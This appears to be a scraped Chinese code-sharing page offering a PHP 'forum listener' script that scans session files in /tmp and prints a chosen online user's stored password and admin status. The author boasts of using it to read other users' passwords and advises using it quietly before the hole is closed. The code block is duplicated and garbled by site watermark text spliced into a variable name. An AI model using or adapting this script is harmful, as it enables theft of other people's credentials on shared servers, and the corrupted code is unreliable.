之所以是能写出来这个函数,主要是对该网站的session结构清楚
如:name|s:4:”tasm”;passwd|s:6:”111111″;mode|s:1:”1″,也知道该session存放的位置,而且可以上传文件,所以嘛,当时就做了一次小小的黑客,在线的朋友的密码可以一览无余,呵呵:
<?
function submit1(){
global $username;
print “论坛监听器 “;
$i=0;
if($username==”tasm”||$username==”Tasm”)
{
print “你也太黑了吧?连我你也查?”;
return;
}
$path=”/tmp/”;
$d = dir($path);
while($entry=$d->read()){
if(substr($entry,0,4)==”sess”){
$entry=$path.$entry;
$ary=@file($entry);
if(!empty($ary[0])){
$ary = explode(“;”,$ary[0]);
$name= explode(“:”,$ary[0]);
if($name[2]==”\””.$username.”\””){
$passwd= explode(“:”,$ary[1]);
$mode=explode(“:”,$ary[3]);
print “用户笔名:”.$name[2].”
使用密码:”.$passwd[2].”
使用模式:”;
if($m来源gaodai#ma#com搞@代~码网ode[1]==1)
print “管理员“;
else
print “一般用户”;
print”论坛监听器
<?
function submit1(){
global $username;
print “
$i=0;
if($username==”tasm”||$username==”Tasm”)
{
print “你也太黑了吧?连我你也查?”;
return;
}
$path=”/tmp/”;
$d = dir($path);
while($entry=$d->read()){
if(substr($entry,0,4)==”sess”){
$entry=$path.$entry;
$ary=@file($entry);
if(!empty($ary[0])){
$ary = explode(“;”,$ary[0]);
$name= explode(“:”,$ary[0]);
if($name[2]==”\””.$username.”\””){
$passwd= explode(“:”,$ary[1]);
$mode=explode(“:”,$ary[3]);
print “用户笔名:”.$name[2].”
使用密码:”.$passwd[2].”
使用模式:”;
if($m来源gaodai#ma#com搞@代~码网ode[1]==1)
print “管理员“;
else
print “一般用户”;
print”
偷窃他人密码是不道德行为请少少为之
“;
$i=1;
break;
}}}}
if(!$i)
print “用户:”.$username.”真的在线吗?如你确定,请再来一次,不要多打空格!”;
$d->close();
}
function login(){
?>
论坛监听器
| 当你看到一用户在线时你想看他的密码,你要如何作呢? | |
| 让我来告诉你:就是使用本程序。 | |
| 郑重申明:本程序为自由程序,由它所造成的任何损失本人盖不负责。 不过这个问题也许很快就会被堵上,个位还是不要张扬的偷着用吧。 |
<form name="form1" method="post" action="”>
请输入你要查的用户名:
<?
}
//————–main()
if($submit1)
submit1();
else
login();
?>
以上就是php查看session内容的函数的详细内容,更多请关注gaodaima搞代码网其它相关文章!
搞代码网(gaodaima.com)提供的所有资源部分来自互联网,如果有侵犯您的版权或其他权益,请说明详细缘由并提供版权或权益证明然后发送到邮箱[email protected],我们会在看到邮件的第一时间内为您处理,或直接联系QQ:872152909。本网站采用BY-NC-SA协议进行授权
转载请注明原文链接:php查看session内容的函数
转载请注明原文链接:php查看session内容的函数
